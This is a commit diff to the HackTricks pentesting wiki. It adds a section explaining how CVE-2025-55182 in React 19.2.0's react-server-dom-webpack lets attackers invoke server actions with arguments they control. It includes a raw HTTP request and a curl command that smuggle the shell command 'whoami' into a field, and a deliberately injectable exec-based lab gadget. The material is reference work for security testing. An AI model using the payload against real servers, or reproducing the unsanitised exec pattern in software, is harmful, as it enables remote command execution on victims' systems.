Merge pull request #1632 from HackTricks-wiki/update_RSC_Report_Lab___CVE-2025-55182__React_19_2_0__20251204_063130

carlospolop · web-flow · commit 39edc55eaff6 · 2025-12-07T17:08:51.000+01:00
RSC Report Lab – CVE-2025-55182 (React 19.2.0)
diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md
@@ -397,6 +397,62 @@ In the following pages you can find information about how to abuse this library
 - [https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)
 - [https://hackerone.com/reports/350418](https://hackerone.com/reports/350418)
 
+### React Server Components / react-server-dom-webpack Server Actions Abuse (CVE-2025-55182)
+
+React Server Components (RSC) rely on `react-server-dom-webpack` (RSDW) to decode server action submissions that are sent as `multipart/form-data`. Each action submission contains:
+
+- `$ACTION_REF_<n>` parts that reference the action being invoked.
+- `$ACTION_<n>:<m>` parts whose body is JSON such as `{"id":"module-path#export","bound":[arg0,arg1,...]}`.
+
+In version **19.2.0** the `decodeAction(formData, serverManifest)` helper blindly trusts both the **`id` string** (selecting which module export to call) and the **`bound` array** (the arguments). If an attacker can reach the endpoint that forwards requests to `decodeAction`, they can invoke any exported server action with attacker-controlled parameters even without a React front-end (CVE-2025-55182). The end-to-end recipe is:
+
+1. **Learn the action identifier.** Bundle output, error traces or leaked manifests typically reveal strings like `app/server-actions#generateReport`.
+2. **Recreate the multipart payload.** Craft a `$ACTION_REF_0` part and a `$ACTION_0:0` JSON body carrying the identifier and arbitrary arguments.
+3. **Let `decodeAction` dispatch it.** The helper resolves the module from `serverManifest`, imports the export, and returns a callable that the server immediately executes.
+
+Example payload hitting `/formaction`:
+
+```http
+POST /formaction HTTP/1.1
+Host: target
+Content-Type: multipart/form-data; boundary=----BOUNDARY
+
+------BOUNDARY
+Content-Disposition: form-data; name="$ACTION_REF_0"
+
+------BOUNDARY
+Content-Disposition: form-data; name="$ACTION_0:0"
+
+{"id":"app/server-actions#generateReport","bound":["acme","pdf & whoami"]}
+------BOUNDARY--
+```
+
+Or with curl:
+
+```bash
+curl -sk -X POST http://target/formaction \
+  -F '$ACTION_REF_0=' \
+  -F '$ACTION_0:0={"id":"app/server-actions#generateReport","bound":["acme","pdf & whoami"]}'
+```
+
+The `bound` array directly populates the server-action parameters. In the vulnerable lab the gadget looks like:
+
+```javascript
+const { exec } = require("child_process");
+const util = require("util");
+const pexec = util.promisify(exec);
+
+async function generateReport(project, format) {
+  const cmd = `node ./scripts/report.js --project=${project} --format=${format}`;
+  const { stdout } = await pexec(cmd);
+  return stdout;
+}
+```
+
+Supplying `format = "pdf & whoami"` makes `/bin/sh -c` run the legitimate report generator and then `whoami`, with both outputs delivered inside the JSON action response. Any server action that wraps filesystem primitives, database drivers or other interpreters can be abused the same way once the attacker controls the `bound` data.
+
+An attacker never needs a real React client—any HTTP tool that emits the `$ACTION_*` multipart shape can directly call server actions and chain the resulting JSON output into an RCE primitive.
+
 ## Java - HTTP
 
 In Java, **deserialization callbacks are executed during the process of deserialization**. This execution can be exploited by attackers who craft malicious payloads that trigger these callbacks, leading to potential execution of harmful actions.
@@ -1193,5 +1249,6 @@ Industrialized gadget discovery:
 - watchTowr Labs – Is This Bad? This Feels Bad — GoAnywhere CVE-2025-10035: https://labs.watchtowr.com/is-this-bad-this-feels-bad-goanywhere-cve-2025-10035/
 - [OffSec – CVE-2025-59287 WSUS unsafe deserialization (blog)](https://www.offsec.com/blog/recent-vulnerabilities-in-redis-servers-lua-scripting-engine-2/)
 - [PoC – tecxx/CVE-2025-59287-WSUS](https://github.com/tecxx/CVE-2025-59287-WSUS)
+- [RSC Report Lab – CVE-2025-55182 (React 19.2.0)](https://github.com/ghe770mvp/RSC_Vuln_Lab)
 
 {{#include ../../banners/hacktricks-training.md}}
